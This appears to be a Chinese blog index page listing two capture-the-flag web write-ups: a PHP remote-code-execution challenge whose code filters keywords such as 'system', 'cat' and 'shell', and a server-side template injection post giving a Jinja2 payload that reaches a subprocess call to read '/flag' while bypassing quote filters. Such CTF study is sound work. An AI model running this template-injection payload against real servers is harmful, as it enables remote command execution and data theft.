2023年3月12日
RCE
摘要: RCE-Web32 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", 阅读全文
posted @ 2023-03-12 12:33 V3g3t4ble 阅读(25) 评论(0) 推荐(0) 编辑
SSTI
摘要: SSTI各种绕过 SSTI-Web363 过滤单双引号 {{[].__class__.__mro__[-1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag SSTI- 阅读全文
posted @ 2023-03-12 00:10 V3g3t4ble 阅读(56) 评论(0) 推荐(0) 编辑